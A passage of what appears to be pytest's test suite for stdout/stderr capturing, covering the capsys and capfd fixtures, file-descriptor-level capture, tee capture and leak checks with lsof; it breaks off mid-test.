    def test_capturing_getfixturevalue(self, pytester: Pytester) -> None:
        """Test that asking for "capfd" and "capsys" using request.getfixturevalue
        in the same test is an error.
        """
        pytester.makepyfile(
            """\
            def test_one(capsys, request):
                request.getfixturevalue("capfd")
            def test_two(capfd, request):
                request.getfixturevalue("capsys")
            """
        )
        result = pytester.runpytest()
        result.stdout.fnmatch_lines(
            [
                "*test_one*",
                "E * cannot use capfd and capsys at the same time",
                "*test_two*",
                "E * cannot use capsys and capfd at the same time",
                "*2 failed in*",
            ]
        )

    def test_capsyscapfdbinary(self, pytester: Pytester) -> None:
        # Mixing a text and a binary capture fixture is also rejected.
        p = pytester.makepyfile(
            """\
            def test_one(capsys, capfdbinary):
                pass
            """
        )
        result = pytester.runpytest(p)
        result.stdout.fnmatch_lines(
            ["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
        )

    @pytest.mark.parametrize("method", ["sys", "fd"])
    def test_capture_is_represented_on_failure_issue128(
        self, pytester: Pytester, method
    ) -> None:
        p = pytester.makepyfile(
            """\
            def test_hello(cap{}):
                print("xxx42xxx")
                assert 0
            """.format(
                method
            )
        )
        result = pytester.runpytest(p)
        result.stdout.fnmatch_lines(["xxx42xxx"])

    def test_stdfd_functional(self, pytester: Pytester) -> None:
        reprec = pytester.inline_runsource(
            """\
            def test_hello(capfd):
                import os
                os.write(1, b"42")
                out, err = capfd.readouterr()
                assert out.startswith("42")
                capfd.close()
            """
        )
        reprec.assertoutcome(passed=1)

    # NOTE(review): "cafd" in the name looks like a typo for "capfd";
    # renaming would change the collected test id, so it is only flagged here.
    @pytest.mark.parametrize("nl", ("\n", "\r\n", "\r"))
    def test_cafd_preserves_newlines(self, capfd, nl) -> None:
        print("test", end=nl)
        out, err = capfd.readouterr()
        assert out.endswith(nl)

    def test_capfdbinary(self, pytester: Pytester) -> None:
        reprec = pytester.inline_runsource(
            """\
            def test_hello(capfdbinary):
                import os
                # some likely un-decodable bytes
                os.write(1, b'\\xfe\\x98\\x20')
                out, err = capfdbinary.readouterr()
                assert out == b'\\xfe\\x98\\x20'
                assert err == b''
            """
        )
        reprec.assertoutcome(passed=1)

    def test_capsysbinary(self, pytester: Pytester) -> None:
        p1 = pytester.makepyfile(
            r"""
            def test_hello(capsysbinary):
                import sys

                sys.stdout.buffer.write(b'hello')

                # Some likely un-decodable bytes.
                sys.stdout.buffer.write(b'\xfe\x98\x20')

                sys.stdout.buffer.flush()

                # Ensure writing in text mode still works and is captured.
                # https://github.com/pytest-dev/pytest/issues/6871
                print("world", flush=True)

                out, err = capsysbinary.readouterr()
                assert out == b'hello\xfe\x98\x20world\n'
                assert err == b''

                print("stdout after")
                print("stderr after", file=sys.stderr)
            """
        )
        result = pytester.runpytest(str(p1), "-rA")
        result.stdout.fnmatch_lines(
            [
                "*- Captured stdout call -*",
                "stdout after",
                "*- Captured stderr call -*",
                "stderr after",
                "*= 1 passed in *",
            ]
        )

    def test_partial_setup_failure(self, pytester: Pytester) -> None:
        # A missing fixture next to capsys must still produce a clean error.
        p = pytester.makepyfile(
            """\
            def test_hello(capsys, missingarg):
                pass
            """
        )
        result = pytester.runpytest(p)
        result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])

    def test_keyboardinterrupt_disables_capturing(self, pytester: Pytester) -> None:
        # KeyboardInterrupt must stop capture so the traceback is visible.
        p = pytester.makepyfile(
            """\
            def test_hello(capfd):
                import os
                os.write(1, b'42')
                raise KeyboardInterrupt()
            """
        )
        result = pytester.runpytest_subprocess(p)
        result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
        assert result.ret == 2

    def test_capture_and_logging(self, pytester: Pytester) -> None:
        """#14"""
        p = pytester.makepyfile(
            """\
            import logging
            def test_log(capsys):
                logging.error('x')
            """
        )
        result = pytester.runpytest_subprocess(p)
        assert "closed" not in result.stderr.str()

    @pytest.mark.parametrize("fixture", ["capsys", "capfd"])
    @pytest.mark.parametrize("no_capture", [True, False])
    def test_disabled_capture_fixture(
        self, pytester: Pytester, fixture: str, no_capture: bool
    ) -> None:
        # Inside fixture.disabled() output bypasses capture entirely.
        pytester.makepyfile(
            """\
            def test_disabled({fixture}):
                print('captured before')
                with {fixture}.disabled():
                    print('while capture is disabled')
                print('captured after')
                assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')

            def test_normal():
                print('test_normal executed')
            """.format(
                fixture=fixture
            )
        )
        args = ("-s",) if no_capture else ()
        result = pytester.runpytest_subprocess(*args)
        result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
        result.stdout.no_fnmatch_line("*captured before*")
        result.stdout.no_fnmatch_line("*captured after*")
        if no_capture:
            assert "test_normal executed" in result.stdout.str()
        else:
            result.stdout.no_fnmatch_line("*test_normal executed*")

    def test_disabled_capture_fixture_twice(self, pytester: Pytester) -> None:
        """Test that an inner disabled() exit doesn't undo an outer disabled().

        Issue #7148.
        """
        pytester.makepyfile(
            """
            def test_disabled(capfd):
                print('captured before')
                with capfd.disabled():
                    print('while capture is disabled 1')
                    with capfd.disabled():
                        print('while capture is disabled 2')
                    print('while capture is disabled 1 after')
                print('captured after')
                assert capfd.readouterr() == ('captured before\\ncaptured after\\n', '')
            """
        )
        result = pytester.runpytest_subprocess()
        result.stdout.fnmatch_lines(
            [
                "*while capture is disabled 1",
                "*while capture is disabled 2",
                "*while capture is disabled 1 after",
            ],
            consecutive=True,
        )

    @pytest.mark.parametrize("fixture", ["capsys", "capfd"])
    def test_fixture_use_by_other_fixtures(self, pytester: Pytester, fixture) -> None:
        """Ensure that capsys and capfd can be used by other fixtures during
        setup and teardown."""
        pytester.makepyfile(
            """\
            import sys
            import pytest

            @pytest.fixture
            def captured_print({fixture}):
                print('stdout contents begin')
                print('stderr contents begin', file=sys.stderr)
                out, err = {fixture}.readouterr()

                yield out, err

                print('stdout contents end')
                print('stderr contents end', file=sys.stderr)
                out, err = {fixture}.readouterr()
                assert out == 'stdout contents end\\n'
                assert err == 'stderr contents end\\n'

            def test_captured_print(captured_print):
                out, err = captured_print
                assert out == 'stdout contents begin\\n'
                assert err == 'stderr contents begin\\n'
            """.format(
                fixture=fixture
            )
        )
        result = pytester.runpytest_subprocess()
        result.stdout.fnmatch_lines(["*1 passed*"])
        result.stdout.no_fnmatch_line("*stdout contents begin*")
        result.stdout.no_fnmatch_line("*stderr contents begin*")

    @pytest.mark.parametrize("cap", ["capsys", "capfd"])
    def test_fixture_use_by_other_fixtures_teardown(
        self, pytester: Pytester, cap
    ) -> None:
        """Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
        pytester.makepyfile(
            """\
            import sys
            import pytest
            import os

            @pytest.fixture()
            def fix({cap}):
                print("setup out")
                sys.stderr.write("setup err\\n")
                yield
                out, err = {cap}.readouterr()
                assert out == 'setup out\\ncall out\\n'
                assert err == 'setup err\\ncall err\\n'

            def test_a(fix):
                print("call out")
                sys.stderr.write("call err\\n")
            """.format(
                cap=cap
            )
        )
        reprec = pytester.inline_run()
        reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(pytester: Pytester) -> None:
    # An exception raised from a conftest pytest_runtest_setup hook must not
    # break capturing for the rest of the run.
    sub1 = pytester.mkpydir("sub1")
    sub1.joinpath("conftest.py").write_text(
        textwrap.dedent(
            """\
            def pytest_runtest_setup(item):
                raise ValueError(42)
            """
        )
    )
    sub1.joinpath("test_mod.py").write_text("def test_func1(): pass")
    result = pytester.runpytest(pytester.path, "--traceconfig")
    result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_capture_conftest_runtest_setup(pytester: Pytester) -> None:
    # Output printed from a conftest setup hook is captured, not shown.
    pytester.makeconftest(
        """
        def pytest_runtest_setup():
            print("hello19")
        """
    )
    pytester.makepyfile("def test_func(): pass")
    result = pytester.runpytest()
    assert result.ret == 0
    result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(pytester: Pytester) -> None:
    # Undecodable bytes written to fd 1 must not crash fd-level capture.
    pytester.makepyfile(
        """
        import os

        def test_func():
            omg = bytearray([1,129,1])
            os.write(1, omg)
            assert 0
        """
    )
    result = pytester.runpytest("--capture=fd")
    result.stdout.fnmatch_lines(
        """
        *def test_func*
        *assert 0*
        *Captured*
        *1 failed*
        """
    )
def test_capture_early_option_parsing(pytester: Pytester) -> None:
    # -s combined with other flags (-vs) must be honored during early
    # option parsing, so hook output reaches stdout.
    pytester.makeconftest(
        """
        def pytest_runtest_setup():
            print("hello19")
        """
    )
    pytester.makepyfile("def test_func(): pass")
    result = pytester.runpytest("-vs")
    assert result.ret == 0
    assert "hello19" in result.stdout.str()
def test_capture_binary_output(pytester: Pytester) -> None:
    # Raw binary bytes on stdout (here via a subprocess re-running the file)
    # must not break capturing.
    pytester.makepyfile(
        r"""
        import pytest

        def test_a():
            import sys
            import subprocess
            subprocess.call([sys.executable, __file__])

        def test_foo():
            import os;os.write(1, b'\xc3')

        if __name__ == '__main__':
            test_foo()
        """
    )
    result = pytester.runpytest("--assert=plain")
    result.assert_outcomes(passed=2)
def test_error_during_readouterr(pytester: Pytester) -> None:
    """Make sure we suspend capturing if errors occur during readouterr"""
    # The plugin monkeypatches FDCapture.snap to raise; the resulting
    # traceback must reach the real stderr instead of being swallowed.
    pytester.makepyfile(
        pytest_xyz="""
        from _pytest.capture import FDCapture

        def bad_snap(self):
            raise Exception('boom')

        assert FDCapture.snap
        FDCapture.snap = bad_snap
        """
    )
    result = pytester.runpytest_subprocess("-p", "pytest_xyz", "--version")
    result.stderr.fnmatch_lines(
        ["*in bad_snap", "    raise Exception('boom')", "Exception: boom"]
    )
class TestCaptureIO:
    """Unit tests for the in-memory CaptureIO text buffer."""

    def test_text(self) -> None:
        f = capture.CaptureIO()
        f.write("hello")
        s = f.getvalue()
        assert s == "hello"
        f.close()

    def test_unicode_and_str_mixture(self) -> None:
        # CaptureIO is text-only; writing bytes must raise TypeError.
        f = capture.CaptureIO()
        f.write("\u00f6")
        pytest.raises(TypeError, f.write, b"hello")

    def test_write_bytes_to_buffer(self) -> None:
        """In python3, stdout / stderr are text io wrappers (exposing a buffer
        property of the underlying bytestream).  See issue #1407
        """
        f = capture.CaptureIO()
        f.buffer.write(b"foo\r\n")
        assert f.getvalue() == "foo\r\n"
class TestTeeCaptureIO(TestCaptureIO):
    """TeeCaptureIO must both capture and pass writes through to the
    wrapped stream."""

    def test_text(self) -> None:
        sio = io.StringIO()
        f = capture.TeeCaptureIO(sio)
        f.write("hello")
        s1 = f.getvalue()
        assert s1 == "hello"
        s2 = sio.getvalue()
        assert s2 == s1  # tee'd copy matches the captured value
        f.close()
        sio.close()

    def test_unicode_and_str_mixture(self) -> None:
        sio = io.StringIO()
        f = capture.TeeCaptureIO(sio)
        f.write("\u00f6")
        pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput() -> None:
    # The stdin replacement must refuse all read operations but still look
    # like a file object (buffer, isatty, close).
    from _pytest.capture import DontReadFromInput

    f = DontReadFromInput()
    assert f.buffer is f
    assert not f.isatty()
    pytest.raises(OSError, f.read)
    pytest.raises(OSError, f.readlines)
    iter_f = iter(f)
    pytest.raises(OSError, next, iter_f)
    pytest.raises(UnsupportedOperation, f.fileno)
    f.close()  # just for completeness
def test_captureresult() -> None:
    # CaptureResult behaves like a 2-tuple (out, err) with named access,
    # equality/hash/ordering compatible with plain tuples.
    cr = CaptureResult("out", "err")
    assert len(cr) == 2
    assert cr.out == "out"
    assert cr.err == "err"
    out, err = cr
    assert out == "out"
    assert err == "err"
    assert cr[0] == "out"
    assert cr[1] == "err"
    assert cr == cr
    assert cr == CaptureResult("out", "err")
    assert cr != CaptureResult("wrong", "err")
    assert cr == ("out", "err")
    assert cr != ("out", "wrong")
    assert hash(cr) == hash(CaptureResult("out", "err"))
    assert hash(cr) == hash(("out", "err"))
    assert hash(cr) != hash(("out", "wrong"))
    assert cr < ("z",)
    assert cr < ("z", "b")
    assert cr < ("z", "b", "c")
    assert cr.count("err") == 1
    assert cr.count("wrong") == 0
    assert cr.index("err") == 1
    with pytest.raises(ValueError):
        assert cr.index("wrong") == 0
    assert next(iter(cr)) == "out"
    assert cr._replace(err="replaced") == ("out", "replaced")
@pytest.fixture
def tmpfile(pytester: Pytester) -> Generator[BinaryIO, None, None]:
    # A fresh binary read/write file inside pytester's tmp dir; closed on
    # teardown unless the test already closed it.
    f = pytester.makepyfile("").open("wb+")
    yield f
    if not f.closed:
        f.close()
@contextlib.contextmanager
def lsof_check():
    """Fail if the wrapped block leaks open regular files (per `lsof`).

    Skips the calling test when `lsof` is unavailable or unusable.
    """
    pid = os.getpid()
    try:
        out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
    except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
        # about UnicodeDecodeError, see note on pytester
        pytest.skip(f"could not run 'lsof' ({exc!r})")
    yield
    out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
    len1 = len([x for x in out.split("\n") if "REG" in x])
    len2 = len([x for x in out2.split("\n") if "REG" in x])
    # small tolerance: unrelated files may legitimately come and go
    assert len2 < len1 + 3, out2
class TestFDCapture:
    """Unit tests for file-descriptor level capturing (capture.FDCapture)."""

    def test_simple(self, tmpfile: BinaryIO) -> None:
        # snap() before start() must assert; after start() it returns what
        # was written to the fd since.
        fd = tmpfile.fileno()
        cap = capture.FDCapture(fd)
        data = b"hello"
        os.write(fd, data)
        pytest.raises(AssertionError, cap.snap)
        cap.done()
        cap = capture.FDCapture(fd)
        cap.start()
        os.write(fd, data)
        s = cap.snap()
        cap.done()
        assert s == "hello"

    def test_simple_many(self, tmpfile: BinaryIO) -> None:
        for i in range(10):
            self.test_simple(tmpfile)

    def test_simple_many_check_open_files(self, pytester: Pytester) -> None:
        # Repeated start/done cycles must not leak file descriptors.
        with lsof_check():
            with pytester.makepyfile("").open("wb+") as tmpfile:
                self.test_simple_many(tmpfile)

    def test_simple_fail_second_start(self, tmpfile: BinaryIO) -> None:
        # start() after done() is a usage error.
        fd = tmpfile.fileno()
        cap = capture.FDCapture(fd)
        cap.done()
        pytest.raises(AssertionError, cap.start)

    def test_stderr(self) -> None:
        cap = capture.FDCapture(2)
        cap.start()
        print("hello", file=sys.stderr)
        s = cap.snap()
        cap.done()
        assert s == "hello\n"

    def test_stdin(self) -> None:
        # While captured, reading fd 0 yields EOF immediately.
        cap = capture.FDCapture(0)
        cap.start()
        x = os.read(0, 100).strip()
        cap.done()
        assert x == b""

    def test_writeorg(self, tmpfile: BinaryIO) -> None:
        # writeorg() bypasses capture and writes to the original target.
        data1, data2 = b"foo", b"bar"
        cap = capture.FDCapture(tmpfile.fileno())
        cap.start()
        tmpfile.write(data1)
        tmpfile.flush()
        cap.writeorg(data2.decode("ascii"))
        scap = cap.snap()
        cap.done()
        assert scap == data1.decode("ascii")
        with open(tmpfile.name, "rb") as stmp_file:
            stmp = stmp_file.read()
            assert stmp == data2

    def test_simple_resume_suspend(self) -> None:
        # Both fd-level writes and sys.stdout writes are captured; suspend()
        # lets output through, resume() captures again.
        with saved_fd(1):
            cap = capture.FDCapture(1)
            cap.start()
            data = b"hello"
            os.write(1, data)
            sys.stdout.write("whatever")
            s = cap.snap()
            assert s == "hellowhatever"
            cap.suspend()
            os.write(1, b"world")
            sys.stdout.write("qlwkej")
            assert not cap.snap()
            cap.resume()
            os.write(1, b"but now")
            sys.stdout.write(" yes\n")
            s = cap.snap()
            assert s == "but now yes\n"
            cap.suspend()
            cap.done()
            pytest.raises(AssertionError, cap.suspend)

            assert repr(cap) == (
                "<FDCapture 1 oldfd={} _state='done' tmpfile={!r}>".format(
                    cap.targetfd_save, cap.tmpfile
                )
            )
            # Should not crash with missing "_old".
            assert repr(cap.syscapture) == (
                "<SysCapture stdout _old=<UNSET> _state='done' tmpfile={!r}>".format(
                    cap.syscapture.tmpfile
                )
            )

    def test_capfd_sys_stdout_mode(self, capfd) -> None:
        assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
    """Preserve file descriptor *fd* across the managed block.

    A duplicate of *fd* is taken on entry; on exit the duplicate is copied
    back over *fd* (restoring its target even if the block closed or
    replaced it) and the backup descriptor is released.
    """
    backup = os.dup(fd)
    try:
        yield
    finally:
        # Point fd back at its original target, then drop the backup.
        os.dup2(backup, fd)
        os.close(backup)
class TestStdCapture:
    """Tests for sys-level capturing (sys.stdout/stderr/stdin replacement).

    Subclasses override ``captureclass`` to re-run the same suite against
    other MultiCapture configurations.
    """

    captureclass = staticmethod(StdCapture)

    @contextlib.contextmanager
    def getcapture(self, **kw):
        # Start a capture, hand it to the test, always stop it afterwards.
        cap = self.__class__.captureclass(**kw)
        cap.start_capturing()
        try:
            yield cap
        finally:
            cap.stop_capturing()

    def test_capturing_done_simple(self) -> None:
        with self.getcapture() as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            out, err = cap.readouterr()
        assert out == "hello"
        assert err == "world"

    def test_capturing_reset_simple(self) -> None:
        with self.getcapture() as cap:
            print("hello world")
            sys.stderr.write("hello error\n")
            out, err = cap.readouterr()
        assert out == "hello world\n"
        assert err == "hello error\n"

    def test_capturing_readouterr(self) -> None:
        with self.getcapture() as cap:
            print("hello world")
            sys.stderr.write("hello error\n")
            out, err = cap.readouterr()
            assert out == "hello world\n"
            assert err == "hello error\n"
            sys.stderr.write("error2")
            out, err = cap.readouterr()
        assert err == "error2"

    def test_capture_results_accessible_by_attribute(self) -> None:
        with self.getcapture() as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            capture_result = cap.readouterr()
        assert capture_result.out == "hello"
        assert capture_result.err == "world"

    def test_capturing_readouterr_unicode(self) -> None:
        # Fixed: the non-ascii literal was mojibake-corrupted in the source;
        # restored to the intended "hxąć".
        with self.getcapture() as cap:
            print("hxąć")
            out, err = cap.readouterr()
        assert out == "hxąć\n"

    def test_reset_twice_error(self) -> None:
        # Stopping an already-stopped capture raises ValueError.
        with self.getcapture() as cap:
            print("hello")
            out, err = cap.readouterr()
        pytest.raises(ValueError, cap.stop_capturing)
        assert out == "hello\n"
        assert not err

    def test_capturing_modify_sysouterr_in_between(self) -> None:
        # A test replacing sys.stdout/stderr itself must not confuse the
        # capture; originals are restored afterwards.
        oldout = sys.stdout
        olderr = sys.stderr
        with self.getcapture() as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            sys.stdout = capture.CaptureIO()
            sys.stderr = capture.CaptureIO()
            print("not seen")
            sys.stderr.write("not seen\n")
            out, err = cap.readouterr()
        assert out == "hello"
        assert err == "world"
        assert sys.stdout == oldout
        assert sys.stderr == olderr

    def test_capturing_error_recursive(self) -> None:
        with self.getcapture() as cap1:
            print("cap1")
            with self.getcapture() as cap2:
                print("cap2")
                out2, err2 = cap2.readouterr()
                out1, err1 = cap1.readouterr()
        assert out1 == "cap1\n"
        assert out2 == "cap2\n"

    def test_just_out_capture(self) -> None:
        with self.getcapture(out=True, err=False) as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            out, err = cap.readouterr()
        assert out == "hello"
        assert not err

    def test_just_err_capture(self) -> None:
        with self.getcapture(out=False, err=True) as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            out, err = cap.readouterr()
        assert err == "world"
        assert not out

    def test_stdin_restored(self) -> None:
        old = sys.stdin
        with self.getcapture(in_=True):
            newstdin = sys.stdin
        assert newstdin != sys.stdin
        assert sys.stdin is old

    def test_stdin_nulled_by_default(self) -> None:
        print("XXX this test may well hang instead of crashing")
        print("XXX which indicates an error in the underlying capturing")
        print("XXX mechanisms")
        with self.getcapture():
            pytest.raises(OSError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
    """Re-run the StdCapture suite with tee'ing (passthrough) capture."""

    captureclass = staticmethod(TeeStdCapture)

    def test_capturing_error_recursive(self) -> None:
        r"""For TeeStdCapture since we passthrough stderr/stdout, cap1
        should get all output, while cap2 should only get "cap2\n"."""
        with self.getcapture() as cap1:
            print("cap1")
            with self.getcapture() as cap2:
                print("cap2")
                out2, err2 = cap2.readouterr()
                out1, err1 = cap1.readouterr()
        assert out1 == "cap1\ncap2\n"
        assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
    """Re-run the StdCapture suite at file-descriptor level, plus fd-only
    scenarios (raw os.write interleaving, fd leak check)."""

    captureclass = staticmethod(StdCaptureFD)

    def test_simple_only_fd(self, pytester: Pytester) -> None:
        # Output written with os.write (invisible to sys-level capture)
        # must still be captured.
        pytester.makepyfile(
            """\
            import os

            def test_x():
                os.write(1, b"hello\\n")
                assert 0
            """
        )
        result = pytester.runpytest_subprocess()
        result.stdout.fnmatch_lines(
            """
            *test_x*
            *assert 0*
            *Captured stdout*
            """
        )

    def test_intermingling(self):
        # fd-level and sys-level writes must be captured in order.
        with self.getcapture() as cap:
            os.write(1, b"1")
            sys.stdout.write(str(2))
            sys.stdout.flush()
            os.write(1, b"3")
            os.write(2, b"a")
            sys.stderr.write("b")
            sys.stderr.flush()
            os.write(2, b"c")
            out, err = cap.readouterr()
        assert out == "123"
        assert err == "abc"

    def test_many(self, capfd):
        # Repeated start/stop cycles must not leak file descriptors.
        with lsof_check():
            for i in range(10):
                cap = StdCaptureFD()
                cap.start_capturing()
                cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
    """fd capture must cope with target descriptors that are already closed."""

    def test_stdcapture_fd_invalid_fd(self, pytester: Pytester) -> None:
        pytester.makepyfile(
            """
            import os
            from fnmatch import fnmatch
            from _pytest import capture

            def StdCaptureFD(out=True, err=True, in_=True):
                return capture.MultiCapture(
                    in_=capture.FDCapture(0) if in_ else None,
                    out=capture.FDCapture(1) if out else None,
                    err=capture.FDCapture(2) if err else None,
                )

            def test_stdout():
                os.close(1)
                cap = StdCaptureFD(out=True, err=False, in_=False)
                assert fnmatch(repr(cap.out), "<FDCapture 1 oldfd=* _state='initialized' tmpfile=*>")
                cap.start_capturing()
                os.write(1, b"stdout")
                assert cap.readouterr() == ("stdout", "")
                cap.stop_capturing()

            def test_stderr():
                os.close(2)
                cap = StdCaptureFD(out=False, err=True, in_=False)
                assert fnmatch(repr(cap.err), "<FDCapture 2 oldfd=* _state='initialized' tmpfile=*>")
                cap.start_capturing()
                os.write(2, b"stderr")
                assert cap.readouterr() == ("", "stderr")
                cap.stop_capturing()

            def test_stdin():
                os.close(0)
                cap = StdCaptureFD(out=False, err=False, in_=True)
                assert fnmatch(repr(cap.in_), "<FDCapture 0 oldfd=* _state='initialized' tmpfile=*>")
                cap.stop_capturing()
            """
        )
        result = pytester.runpytest_subprocess("--capture=fd")
        assert result.ret == 0
        assert result.parseoutcomes()["passed"] == 3

    def test_fdcapture_invalid_fd_with_fd_reuse(self, pytester: Pytester) -> None:
        # fd 1 is closed but gets re-created by start(); done() must close
        # it again, so the final write fails.
        with saved_fd(1):
            os.close(1)
            cap = capture.FDCaptureBinary(1)
            cap.start()
            os.write(1, b"started")
            cap.suspend()
            os.write(1, b" suspended")
            cap.resume()
            os.write(1, b" resumed")
            assert cap.snap() == b"started resumed"
            cap.done()
            with pytest.raises(OSError):
                os.write(1, b"done")

    def test_fdcapture_invalid_fd_without_fd_reuse(self, pytester: Pytester) -> None:
        # Same, but fd 1 AND 2 are closed so the target fd number is not
        # immediately reused by the tmpfile.
        with saved_fd(1), saved_fd(2):
            os.close(1)
            os.close(2)
            cap = capture.FDCaptureBinary(2)
            cap.start()
            os.write(2, b"started")
            cap.suspend()
            os.write(2, b" suspended")
            cap.resume()
            os.write(2, b" resumed")
            assert cap.snap() == b"started resumed"
            cap.done()
            with pytest.raises(OSError):
                os.write(2, b"done")
def test_capture_not_started_but_reset() -> None:
    # stop_capturing() on a never-started capture must be a no-op, not an error.
    capsys = StdCapture()
    capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(
    capsys: CaptureFixture[str],
) -> None:
    # The replaced sys.stdout must expose a usable .encoding attribute.
    test_text = "test text"

    print(test_text.encode(sys.stdout.encoding, "replace"))
    (out, err) = capsys.readouterr()
    assert out
    assert err == ""
def test_capsys_results_accessible_by_attribute(capsys: CaptureFixture[str]) -> None:
    # readouterr() returns a named tuple with .out / .err attributes.
    sys.stdout.write("spam")
    sys.stderr.write("eggs")
    capture_result = capsys.readouterr()
    assert capture_result.out == "spam"
    assert capture_result.err == "eggs"
def test_fdcapture_tmpfile_remains_the_same() -> None:
    # readouterr() must reuse the same backing tmpfile, not allocate a new one.
    cap = StdCaptureFD(out=False, err=True)
    try:
        cap.start_capturing()
        capfile = cap.err.tmpfile
        cap.readouterr()
    finally:
        cap.stop_capturing()
    capfile2 = cap.err.tmpfile
    assert capfile2 == capfile
def test_close_and_capture_again(pytester: Pytester) -> None:
    # A test closing fd 1 must not break capture for the following test.
    pytester.makepyfile(
        """
        import os

        def test_close():
            os.close(1)

        def test_capture_again():
            os.write(1, b"hello\\n")
            assert 0
        """
    )
    result = pytester.runpytest_subprocess()
    result.stdout.fnmatch_lines(
        """
        *test_capture_again*
        *assert 0*
        *stdout*
        *hello*
        """
    )
@pytest.mark.parametrize(
    "method", ["SysCapture(2)", "SysCapture(2, tee=True)", "FDCapture(2)"]
)
def test_capturing_and_logging_fundamentals(pytester: Pytester, method: str) -> None:
    # here we check a fundamental feature: logging output is captured while
    # capturing is active, and pop_outerr_to_orig() forwards it to the
    # original stream.
    p = pytester.makepyfile(
        """
        import sys, os
        import py, logging
        from _pytest import capture
        cap = capture.MultiCapture(
            in_=None,
            out=None,
            err=capture.%s,
        )
        cap.start_capturing()

        logging.warning("hello1")
        outerr = cap.readouterr()
        print("suspend, captured %%s" %%(outerr,))
        logging.warning("hello2")

        cap.pop_outerr_to_orig()
        logging.warning("hello3")

        outerr = cap.readouterr()
        print("suspend2, captured %%s" %% (outerr,))
        """
        % (method,)
    )
    result = pytester.runpython(p)
    result.stdout.fnmatch_lines(
        """
        suspend, captured*hello1*
        suspend2, captured*WARNING:root:hello3*
        """
    )
    result.stderr.fnmatch_lines(
        """
        WARNING:root:hello2
        """
    )
    assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(pytester: Pytester) -> None:
    # Captured stdout/stderr must report errors="replace" like real streams.
    pytester.makepyfile(
        """
        import sys

        def test_capattr():
            assert sys.stdout.errors == "replace"
            assert sys.stderr.errors == "replace"
        """
    )
    reprec = pytester.inline_run()
    reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
    not sys.platform.startswith("win"),
    reason="only on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams() -> None:
    """
    Ensure _py36_windowsconsoleio_workaround function works with objects that
    do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
    """
    from _pytest.capture import _py36_windowsconsoleio_workaround

    class DummyStream:
        def write(self, s):
            pass

    stream = cast(TextIO, DummyStream())
    _py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(pytester: Pytester) -> None:
    # The stdin replacement must expose .encoding like a real text stream.
    pytester.makepyfile(
        """
        import sys

        def test_capattr():
            # should not raise AttributeError
            assert sys.stdout.encoding
            assert sys.stderr.encoding
        """
    )
    reprec = pytester.inline_run()
    reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(
    pytester: Pytester, monkeypatch: MonkeyPatch
) -> None:
    # A background thread flushing stderr while capture tears down its
    # tmpfile must not crash the run.
    p = pytester.makepyfile(
        """
        import threading
        import sys

        printing = threading.Event()

        def spam():
            f = sys.stderr
            print('SPAMBEFORE', end='', file=f)
            printing.set()

            while True:
                try:
                    f.flush()
                except (OSError, ValueError):
                    break

        def test_spam_in_thread():
            t = threading.Thread(target=spam)
            t.daemon = True
            t.start()

            printing.wait()
        """
    )
    # Do not consider plugins like hypothesis, which might output to stderr.
    monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
    result = pytester.runpytest_subprocess(str(p))
    assert result.ret == 0
    assert result.stderr.str() == ""
    result.stdout.no_fnmatch_line("*OSError*")
def test_global_capture_with_live_logging(pytester: Pytester) -> None:
    # Issue 3819
    # capture should work with live cli logging
    # Teardown report seems to have the capture for the whole process (setup, capture, teardown)
    pytester.makeconftest(
        """
        def pytest_runtest_logreport(report):
            if "test_global" in report.nodeid:
                if report.when == "teardown":
                    with open("caplog", "w") as f:
                        f.write(report.caplog)
                    with open("capstdout", "w") as f:
                        f.write(report.capstdout)
        """
    )
    pytester.makepyfile(
        """
        import logging
        import sys
        import pytest

        logger = logging.getLogger(__name__)

        @pytest.fixture
        def fix1():
            print("fix setup")
            logging.info("fix setup")
            yield
            logging.info("fix teardown")
            print("fix teardown")

        def test_global(fix1):
            print("begin test")
            logging.info("something in test")
            print("end test")
        """
    )
    result = pytester.runpytest_subprocess("--log-cli-level=INFO")
    assert result.ret == 0

    # The teardown report carries the accumulated log and stdout of all phases.
    with open("caplog") as f:
        caplog = f.read()

    assert "fix setup" in caplog
    assert "something in test" in caplog
    assert "fix teardown" in caplog

    with open("capstdout") as f:
        capstdout = f.read()

    assert "fix setup" in capstdout
    assert "begin test" in capstdout
    assert "end test" in capstdout
    assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(
    pytester: Pytester, capture_fixture: str  # parametrized fixture *name*, not the fixture itself
) -> None:
    # Issue 3819
    # capture should work with live cli logging
    pytester.makepyfile(
        """
        import logging
        import sys

        logger = logging.getLogger(__name__)

        def test_capture({0}):
            print("hello")
            sys.stderr.write("world\\n")
            captured = {0}.readouterr()
            assert captured.out == "hello\\n"
            assert captured.err == "world\\n"

            logging.info("something")
            print("next")
            logging.info("something")

            captured = {0}.readouterr()
            assert captured.out == "next\\n"
